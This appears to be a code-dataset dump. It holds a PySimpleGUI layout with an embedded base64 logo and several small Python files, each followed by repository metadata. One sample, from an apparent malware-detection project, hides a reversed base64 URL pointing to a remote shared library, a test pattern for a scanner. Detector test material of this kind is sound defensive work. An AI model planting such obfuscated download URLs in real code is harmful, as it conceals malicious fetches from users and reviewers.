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'
logo = [sg.Image(logo_image)]
question_row = [sg.Text("How many syllables do you want in your word? : ", font=("SegoeUI", 18))]
radio_buttons = [sg.Radio(text="1", group_id="-RADIO-", default=True, key="-RADIO1-", font=("SegoeUI", 16)),
sg.Radio(text="2", group_id="-RADIO-", key="-RADIO2-", font=("SegoeUI", 16)),
sg.Radio(text="3", group_id="-RADIO-", key="-RADIO3-", font=("SegoeUI", 16))]
generate_button = [sg.Button("GENERATE", font=("SegoeUI", 18), key="-GENERATE-", )]
result_text = [sg.Text(text="", key="-RESULT-", font=("SegoeUI", 18), size=(30, 5), justification="center",
background_color=sweet_light_red)]
# LAYOUT (column)
layout = [[sg.Column([logo, question_row, radio_buttons, generate_button, result_text],
element_justification="center", justification="center")]]
window = sg.Window("Random Syllables", layout, size=(650, 525), icon=icon)
| 955 | 30,122 | 0.951166 | 1,165 | 31,515 | 25.696137 | 0.884979 | 0.002205 | 0.002672 | 0.002305 | 0.005345 | 0.005345 | 0.002739 | 0.002739 | 0 | 0 | 0 | 0.155445 | 0.006092 | 31,515 | 32 | 30,123 | 984.84375 | 0.800275 | 0.001936 | 0 | 0 | 0 | 0.043478 | 0.966866 | 0.959711 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.043478 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3e721c6e2c8468fc074c6847c2e35f36038b2831 | 27 | py | Python | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | 5 | 2021-03-20T01:38:58.000Z | 2022-03-16T11:43:36.000Z | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | 6 | 2021-02-22T08:46:34.000Z | 2022-03-11T20:08:37.000Z | tools/__init__.py | NotJoeMartinez/python3-groupme-tools | 19cb96f6bb00225dc2654b764b74f48cd9ba514a | [
"MIT"
] | null | null | null | from .avatar_fetch import * | 27 | 27 | 0.814815 | 4 | 27 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e4454e7377a8b6c91e4bc917a808a8b9a137be01 | 85 | py | Python | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/base64-b64encode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | import base64
base64.b64encode("=82cus2Ylh2YvQ3clVXclJ3Lw9GdukHelR2LvoDc0RHa"[::-1])
| 28.333333 | 70 | 0.835294 | 6 | 85 | 11.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 0.035294 | 85 | 2 | 71 | 42.5 | 0.670732 | 0 | 0 | 0 | 0 | 0 | 0.517647 | 0.517647 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e454fc3f15c21ee8fe43b74060a2b8b232b3de58 | 89 | py | Python | src/hub/dataload/sources/drugbank/__init__.py | ravila4/mychem.info | 9b63b5f0957b5e7b252ca8122734a363905036b3 | [
"Apache-2.0"
] | 10 | 2017-07-24T11:45:27.000Z | 2022-02-14T13:42:36.000Z | src/hub/dataload/sources/drugbank/__init__.py | veleritas/mychem.info | bb22357d4cbbc3c4865da224bf998f2cbc59f8f2 | [
"Apache-2.0"
] | 92 | 2017-06-22T16:49:20.000Z | 2022-03-24T20:50:01.000Z | src/hub/dataload/sources/drugbank/__init__.py | veleritas/mychem.info | bb22357d4cbbc3c4865da224bf998f2cbc59f8f2 | [
"Apache-2.0"
] | 11 | 2017-06-12T18:31:35.000Z | 2022-01-31T02:56:52.000Z | from .drugbank_upload import DrugBankUploader
from .drugbank_dump import DrugBankDumper
| 22.25 | 45 | 0.876404 | 10 | 89 | 7.6 | 0.7 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 89 | 3 | 46 | 29.666667 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e45b6a191a637d50928fd58e1a322150cae42d6a | 40 | py | Python | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | dqn_env/envs/__init__.py | sokolegg/dqn_env | 9d9a14828a38d205ffb992a918d51053a1e35b8b | [
"MIT"
] | null | null | null | from gym_foo.envs.dqn_env import DQNEnv
| 20 | 39 | 0.85 | 8 | 40 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5f424f2b7a749f235960c9e6ff413a6494a9c8d9 | 96 | py | Python | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/pip/_vendor/tenacity/tornadoweb.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/ab/75/d9/5b603d464cb50615106cd1c5eb584cd445d0e7b740ef0c4f9e548ec77b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5f7bfbcac122f8b7fb403d05e8ff59f535d943fc | 23 | py | Python | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | 1 | 2020-06-08T10:27:24.000Z | 2020-06-08T10:27:24.000Z | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | null | null | null | modulos/__init__.py | andelpe/curso-intro-python | 6b3521aa887ae26e0f542f2dd105e9bb003db495 | [
"Apache-2.0"
] | 1 | 2020-06-08T09:49:24.000Z | 2020-06-08T09:49:24.000Z | from .subpack import *
| 11.5 | 22 | 0.73913 | 3 | 23 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5fa3437c41aee2ccd60dceefa0a281b32fd7a9ac | 154 | py | Python | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | hardwork/hardway/34_accessing.py | jskyzero/Python.Playground | 6a6d815d2307d17657b7622201874e4ee7f2324a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
animals = ["1", "2", "3", "4","5"]
print animals
print "animals[0] is %s" % animals[0]
print "animals[-1] is %s" % animals[-1]
| 17.111111 | 39 | 0.532468 | 25 | 154 | 3.28 | 0.52 | 0.292683 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 0.181818 | 154 | 8 | 40 | 19.25 | 0.571429 | 0.136364 | 0 | 0 | 0 | 0 | 0.290076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
39555fea2b53e169fe97b664f2e3b9d379207489 | 43 | py | Python | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | handwritten_num_classifier/__init__.py | meow-noisy/handwritten_num_classifier | 779f02bc1e082b33fec6e1b6a814ff99498429ac | [
"MIT"
] | null | null | null | from .api import load_model, download_model | 43 | 43 | 0.860465 | 7 | 43 | 5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3971c13d33901f93e735b565a4f6f04e1e902c17 | 26 | py | Python | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | null | null | null | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | null | null | null | leopy/workpy/__init__.py | pobingxiaoxiao/leopy | c6fc291cfcd5a8fa58614873edac9b09f20f2e0a | [
"MIT"
] | 1 | 2019-06-10T02:09:46.000Z | 2019-06-10T02:09:46.000Z | from .work import open_app | 26 | 26 | 0.846154 | 5 | 26 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
39a551a4935b82ee353f9b437e601378cbb1938a | 153 | py | Python | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
"MIT"
] | null | null | null | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
"MIT"
] | null | null | null | accounts/admin.py | tochikaze3/Wildcart | 7c0f7176ea1a79bdd7662845e8722c2dc7d3b502 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Vendor
# Register your models here.
#admin.site.register(UserProfile)
admin.site.register(Vendor)
| 21.857143 | 33 | 0.803922 | 21 | 153 | 5.857143 | 0.571429 | 0.146341 | 0.276423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 153 | 6 | 34 | 25.5 | 0.904412 | 0.379085 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2df54d32df5bab55b6ae7f2965a3305bbd45710 | 45 | py | Python | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
] | 1 | 2020-04-11T19:56:50.000Z | 2020-04-11T19:56:50.000Z | kreta/__main__.py | UnknownPlayer78/kreta-cli | 08c8a34ef17fa484e8bbb4785e744dc775541daa | [
"MIT"
